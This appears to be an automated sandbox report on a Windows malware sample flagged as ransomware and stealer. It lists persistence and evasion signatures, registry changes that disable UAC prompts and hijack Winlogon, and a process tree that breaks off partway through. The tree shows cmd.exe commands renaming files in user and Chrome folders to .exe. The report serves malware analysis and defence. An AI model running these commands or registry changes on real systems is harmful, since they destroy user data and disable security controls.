817a695e53a1d6e24f2c701751b4d18468f20698f30fada420dfba6e21a09797

Analysis

max time kernel
4294083s
max time network
22s
platform
windows7_x64
resource
win7-20220223-en
submitted
05-03-2022 18:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

817a695e53a1d6e24f2c701751b4d18468f20698f30fada420dfba6e21a09797.exe
Size

3.0MB
MD5

149cc2ec1900cb778afb50d8026eadf5
SHA1

a7bc1bbc7bdc970757ec369ef0b51dc53989f131
SHA256

817a695e53a1d6e24f2c701751b4d18468f20698f30fada420dfba6e21a09797
SHA512

d617654478beb6325d86c108cddaff8f8d658a235d26b8e0282ed85dca826bdb62b0b67e749c7cd421dbae1d98084220e2f4d5779badb8fd7ab07ff333a35553

Score

10^/10

evasion persistence ransomware spyware stealer trojan

Malware Config

Signatures

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, wscript.exe \"C:\\bug32\\runner.vbs\""	wscript.exe

Modifies system executable filetype association 2 TTPs 2 IoCs

persistence

Modify Registry

T1112

Change Default File Association

T1042

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon	wscript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\ = "C:\\Bug32\\icon.ico"	wscript.exe

UAC bypass 3 TTPs
evasion trojan

Bypass User Account Control
T1088

Disabling Security Tools
T1089

Modify Registry
T1112
Disables RegEdit via registry modification
evasion
Disables Task Manager via registry modification
evasion

Modifies extensions of user files 4 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

description	ioc	Process
File opened for modification	C:\Users\Admin\Pictures\StartResolve.tiff	wscript.exe
File opened for modification	C:\Users\Admin\Pictures\WatchStart.tiff	wscript.exe
File opened for modification	C:\Users\Admin\Pictures\CompleteBlock.tiff	wscript.exe
File opened for modification	C:\Users\Admin\Pictures\ShowGrant.tiff	wscript.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini	wscript.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Drops desktop.ini file(s) 40 IoCs

description	ioc	Process
File created	C:\Users\Admin\Contacts\desktop.ini	wscript.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\desktop.ini	wscript.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\desktop.ini	wscript.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\Desktop.ini	wscript.exe
File created	C:\Users\Admin\Favorites\Links for United States\desktop.ini	wscript.exe
File created	C:\Users\Admin\Favorites\desktop.ini	wscript.exe
File created	C:\Users\Admin\Pictures\desktop.ini	wscript.exe
File created	C:\Users\Admin\Searches\desktop.ini	wscript.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\M7YMRK48\desktop.ini	wscript.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\KV8PQJCO\desktop.ini	wscript.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\Desktop.ini	wscript.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini	wscript.exe
File created	C:\Users\Admin\Downloads\desktop.ini	wscript.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	wscript.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini	wscript.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini	wscript.exe
File created	C:\Users\Admin\Links\desktop.ini	wscript.exe
File created	C:\Users\Admin\Music\desktop.ini	wscript.exe
File created	C:\Users\Admin\Videos\desktop.ini	wscript.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\AGWPI80M\desktop.ini	wscript.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I7HKSP8D\desktop.ini	wscript.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	wscript.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini	wscript.exe
File created	C:\Users\Admin\Desktop\desktop.ini	wscript.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini	wscript.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SNCNYYOH\desktop.ini	wscript.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini	wscript.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini	wscript.exe
File created	C:\Users\Admin\Documents\desktop.ini	wscript.exe
File created	C:\Users\Admin\Saved Games\desktop.ini	wscript.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Windows\History\History.IE5\desktop.ini	wscript.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini	wscript.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\IWNCTIG4\desktop.ini	wscript.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\AZW6OKHO\desktop.ini	wscript.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini	wscript.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini	wscript.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\72C1GWO9\desktop.ini	wscript.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini	wscript.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini	wscript.exe
File created	C:\Users\Admin\Favorites\Links\desktop.ini	wscript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies Control Panel 4 IoCs

evasion

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1405931862-909307831-4085185274-1000\Control Panel\Cursors	wscript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1405931862-909307831-4085185274-1000\Control Panel\Cursors\Arrow = "C:\\bug32\\bx.cur"	wscript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1405931862-909307831-4085185274-1000\Control Panel\Cursors\AppStarting = "C:\\bug32\\bx.cur"	wscript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1405931862-909307831-4085185274-1000\Control Panel\Cursors\Hand = "C:\\bug32\\bx.cur"	wscript.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon	wscript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\ = "C:\\Bug32\\icon.ico"	wscript.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1500	wscript.exe

Suspicious behavior: RenamesItself 1 IoCs

pid	Process
1636	conhost.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeShutdownPrivilege	1152	shutdown.exe
Token: SeRemoteShutdownPrivilege	1152	shutdown.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1476 wrote to memory of 1716	1476	817a695e53a1d6e24f2c701751b4d18468f20698f30fada420dfba6e21a09797.exe	27
PID 1476 wrote to memory of 1716	1476	817a695e53a1d6e24f2c701751b4d18468f20698f30fada420dfba6e21a09797.exe	27
PID 1476 wrote to memory of 1716	1476	817a695e53a1d6e24f2c701751b4d18468f20698f30fada420dfba6e21a09797.exe	27
PID 1476 wrote to memory of 1716	1476	817a695e53a1d6e24f2c701751b4d18468f20698f30fada420dfba6e21a09797.exe	27
PID 1716 wrote to memory of 1524	1716	wscript.exe	28
PID 1716 wrote to memory of 1524	1716	wscript.exe	28
PID 1716 wrote to memory of 1524	1716	wscript.exe	28
PID 1524 wrote to memory of 1500	1524	wscript.exe	29
PID 1524 wrote to memory of 1500	1524	wscript.exe	29
PID 1524 wrote to memory of 1500	1524	wscript.exe	29
PID 1500 wrote to memory of 856	1500	wscript.exe	30
PID 1500 wrote to memory of 856	1500	wscript.exe	30
PID 1500 wrote to memory of 856	1500	wscript.exe	30
PID 1500 wrote to memory of 856	1500	wscript.exe	30
PID 1500 wrote to memory of 324	1500	wscript.exe	31
PID 1500 wrote to memory of 324	1500	wscript.exe	31
PID 1500 wrote to memory of 324	1500	wscript.exe	31
PID 856 wrote to memory of 1120	856	wmplayer.exe	33
PID 856 wrote to memory of 1120	856	wmplayer.exe	33
PID 856 wrote to memory of 1120	856	wmplayer.exe	33
PID 856 wrote to memory of 1120	856	wmplayer.exe	33
PID 856 wrote to memory of 1120	856	wmplayer.exe	33
PID 856 wrote to memory of 1120	856	wmplayer.exe	33
PID 856 wrote to memory of 1120	856	wmplayer.exe	33
PID 1500 wrote to memory of 1144	1500	wscript.exe	34
PID 1500 wrote to memory of 1144	1500	wscript.exe	34
PID 1500 wrote to memory of 1144	1500	wscript.exe	34
PID 1500 wrote to memory of 776	1500	wscript.exe	36
PID 1500 wrote to memory of 776	1500	wscript.exe	36
PID 1500 wrote to memory of 776	1500	wscript.exe	36
PID 1500 wrote to memory of 1076	1500	wscript.exe	38
PID 1500 wrote to memory of 1076	1500	wscript.exe	38
PID 1500 wrote to memory of 1076	1500	wscript.exe	38
PID 1500 wrote to memory of 728	1500	wscript.exe	40
PID 1500 wrote to memory of 728	1500	wscript.exe	40
PID 1500 wrote to memory of 728	1500	wscript.exe	40
PID 1500 wrote to memory of 1992	1500	wscript.exe	42
PID 1500 wrote to memory of 1992	1500	wscript.exe	42
PID 1500 wrote to memory of 1992	1500	wscript.exe	42
PID 1500 wrote to memory of 892	1500	wscript.exe	44
PID 1500 wrote to memory of 892	1500	wscript.exe	44
PID 1500 wrote to memory of 892	1500	wscript.exe	44
PID 1500 wrote to memory of 1616	1500	wscript.exe	46
PID 1500 wrote to memory of 1616	1500	wscript.exe	46
PID 1500 wrote to memory of 1616	1500	wscript.exe	46
PID 1500 wrote to memory of 1252	1500	wscript.exe	89
PID 1500 wrote to memory of 1252	1500	wscript.exe	89
PID 1500 wrote to memory of 1252	1500	wscript.exe	89
PID 1500 wrote to memory of 576	1500	wscript.exe	50
PID 1500 wrote to memory of 576	1500	wscript.exe	50
PID 1500 wrote to memory of 576	1500	wscript.exe	50
PID 1500 wrote to memory of 1476	1500	wscript.exe	52
PID 1500 wrote to memory of 1476	1500	wscript.exe	52
PID 1500 wrote to memory of 1476	1500	wscript.exe	52
PID 1500 wrote to memory of 592	1500	wscript.exe	96
PID 1500 wrote to memory of 592	1500	wscript.exe	96
PID 1500 wrote to memory of 592	1500	wscript.exe	96
PID 1500 wrote to memory of 1836	1500	wscript.exe	56
PID 1500 wrote to memory of 1836	1500	wscript.exe	56
PID 1500 wrote to memory of 1836	1500	wscript.exe	56
PID 1500 wrote to memory of 1652	1500	wscript.exe	101
PID 1500 wrote to memory of 1652	1500	wscript.exe	101
PID 1500 wrote to memory of 1652	1500	wscript.exe	101
PID 1500 wrote to memory of 552	1500	wscript.exe	60

System policy modification 1 TTPs 4 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Consentpromptbehavioradmin = "0"	wscript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	wscript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	wscript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	wscript.exe

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
1368	attrib.exe

C:\Users\Admin\AppData\Local\Temp\817a695e53a1d6e24f2c701751b4d18468f20698f30fada420dfba6e21a09797.exe
"C:\Users\Admin\AppData\Local\Temp\817a695e53a1d6e24f2c701751b4d18468f20698f30fada420dfba6e21a09797.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1476
- C:\Windows\system32\wscript.exe
  "C:\Windows\sysnative\wscript.exe" C:\Users\Admin\AppData\Local\Temp\1D31.tmp\1D32.vbs
  2⤵
  - Suspicious use of WriteProcessMemory
  - System policy modification
  PID:1716
- - C:\Windows\System32\wscript.exe
    "C:\Windows\System32\wscript.exe" "C:\BUG32\admin.vbs"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1524
  - - C:\Windows\System32\wscript.exe
      "C:\Windows\System32\wscript.exe" "C:\bug32\jaq.vbs" RunAsAdministrator
      4⤵
      Modifies WinLogon for persistence
      Modifies system executable filetype association
      Modifies extensions of user files
      Drops startup file
      Drops desktop.ini file(s)
      Modifies Control Panel
      Modifies registry class
      Suspicious behavior: GetForegroundWindowSpam
      Suspicious use of WriteProcessMemory
      System policy modification
      PID:1500
    - - C:\Program Files (x86)\Windows Media Player\wmplayer.exe
        
        "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:856
      - C:\Program Files (x86)\Windows Media Player\setup_wm.exe
        
        "C:\Program Files (x86)\Windows Media Player\setup_wm.exe" /RunOnce:"C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
        6⤵
        
        PID:1120
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c dir "C:\Users\Admin\" /s/b/o:n/a:d > "C:\BUG32\list.lnk" & echo :ok:>>"C:\bug32\list.lnk"
        5⤵
        
        PID:324
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\*.*" "*.exe"
        5⤵
        
        PID:1144
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Application Data\*.*" "*.exe"
        5⤵
        
        PID:776
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Contacts\*.*" "*.exe"
        5⤵
        
        PID:1076
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Cookies\*.*" "*.exe"
        5⤵
        
        PID:728
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Desktop\*.*" "*.exe"
        5⤵
        
        PID:1992
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Documents\*.*" "*.exe"
        5⤵
        
        PID:892
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Downloads\*.*" "*.exe"
        5⤵
        
        PID:1616
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Favorites\*.*" "*.exe"
        5⤵
        
        PID:1252
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Links\*.*" "*.exe"
        5⤵
        
        PID:576
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Local Settings\*.*" "*.exe"
        5⤵
        
        PID:1476
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Music\*.*" "*.exe"
        5⤵
        
        PID:592
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\My Documents\*.*" "*.exe"
        5⤵
        
        PID:1836
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\NetHood\*.*" "*.exe"
        5⤵
        
        PID:1652
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Pictures\*.*" "*.exe"
        5⤵
        
        PID:552
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\PrintHood\*.*" "*.exe"
        5⤵
        
        PID:1492
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Recent\*.*" "*.exe"
        5⤵
        
        PID:1900
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Saved Games\*.*" "*.exe"
        5⤵
        
        PID:1508
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Searches\*.*" "*.exe"
        5⤵
        
        PID:1724
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\SendTo\*.*" "*.exe"
        5⤵
        
        PID:1400
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Start Menu\*.*" "*.exe"
        5⤵
        
        PID:800
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Templates\*.*" "*.exe"
        5⤵
        
        PID:1704
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\Videos\*.*" "*.exe"
        5⤵
        
        PID:1316
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\*.*" "*.exe"
        5⤵
        
        PID:1984
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\*.*" "*.exe"
        5⤵
        
        PID:1156
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Roaming\*.*" "*.exe"
        5⤵
        
        PID:1380
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Adobe\*.*" "*.exe"
        5⤵
        
        PID:1212
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Application Data\*.*" "*.exe"
        5⤵
        
        PID:1960
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\*.*" "*.exe"
        5⤵
        
        PID:1592
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\History\*.*" "*.exe"
        5⤵
        
        PID:748
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\*.*" "*.exe"
        5⤵
        
        PID:1112
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft Help\*.*" "*.exe"
        5⤵
        
        PID:1436
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\*.*" "*.exe"
        5⤵
        
        PID:592
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Temp\*.*" "*.exe"
        5⤵
        
        PID:1636
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Temporary Internet Files\*.*" "*.exe"
        5⤵
        
        PID:924
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Adobe\Acrobat\*.*" "*.exe"
        5⤵
        
        PID:2040
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Adobe\Color\*.*" "*.exe"
        5⤵
        
        PID:776
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Adobe\Acrobat\9.0\*.*" "*.exe"
        5⤵
        
        PID:1944
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Adobe\Acrobat\9.0\Cache\*.*" "*.exe"
        5⤵
        
        PID:1224
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Adobe\Color\Profiles\*.*" "*.exe"
        5⤵
        
        PID:728
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\*.*" "*.exe"
        5⤵
        
        PID:2012
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\*.*" "*.exe"
        5⤵
        
        PID:1936
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\AutofillStates\*.*" "*.exe"
        5⤵
        
        PID:840
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\BrowserMetrics\*.*" "*.exe"
        5⤵
        
        PID:1152
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\CertificateRevocation\*.*" "*.exe"
        5⤵
        
        PID:1368
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\*.*" "*.exe"
        5⤵
        
        PID:820
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crowd Deny\*.*" "*.exe"
        5⤵
        
        PID:1624
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\*.*" "*.exe"
        5⤵
        
        PID:796
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\FileTypePolicies\*.*" "*.exe"
        5⤵
        
        PID:1100
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Floc\*.*" "*.exe"
        5⤵
        
        PID:1476
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\FontLookupTableCache\*.*" "*.exe"
        5⤵
        
        PID:748
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GrShaderCache\*.*" "*.exe"
        5⤵
        
        PID:1112
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\hyphen-data\*.*" "*.exe"
        5⤵
        
        PID:324
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\MEIPreload\*.*" "*.exe"
        5⤵
        
        PID:1836
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\OnDeviceHeadSuggestModel\*.*" "*.exe"
        5⤵
        
        PID:548
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\pnacl\*.*" "*.exe"
        5⤵
        
        PID:1132
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\RecoveryImproved\*.*" "*.exe"
        5⤵
        
        PID:1116
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Safe Browsing\*.*" "*.exe"
        5⤵
        
        PID:1944
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\OriginTrials\*.*" "*.exe"
        5⤵
        
        PID:1076
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\SafetyTips\*.*" "*.exe"
        5⤵
        
        PID:888
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\*.*" "*.exe"
        5⤵
        
        PID:1748
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\*.*" "*.exe"
        5⤵
        
        PID:1496
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Subresource Filter\*.*" "*.exe"
        5⤵
        
        PID:916
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\SwReporter\*.*" "*.exe"
        5⤵
        
        PID:1996
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList64\*.*" "*.exe"
        5⤵
        
        PID:472
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\TLSDeprecationConfig\*.*" "*.exe"
        5⤵
        
        PID:1052
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\WidevineCdm\*.*" "*.exe"
        5⤵
        
        PID:1212
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ZxcvbnData\*.*" "*.exe"
        5⤵
        
        PID:1628
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\reports\*.*" "*.exe"
        5⤵
        
        PID:1592
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\*.*" "*.exe"
        5⤵
        
        PID:1588
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\*.*" "*.exe"
        5⤵
        
        PID:1332
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension State\*.*" "*.exe"
        5⤵
        
        PID:1568
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\*.*" "*.exe"
        5⤵
        
        PID:980
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\*.*" "*.exe"
        5⤵
        
        PID:1552
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Platform Notifications\*.*" "*.exe"
        5⤵
        
        PID:2040
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage\*.*" "*.exe"
        5⤵
        
        PID:856
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sessions\*.*" "*.exe"
        5⤵
        
        PID:1892
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\*.*" "*.exe"
        5⤵
        
        PID:1144
    - - C:\Windows\System32\cmd.exe
        
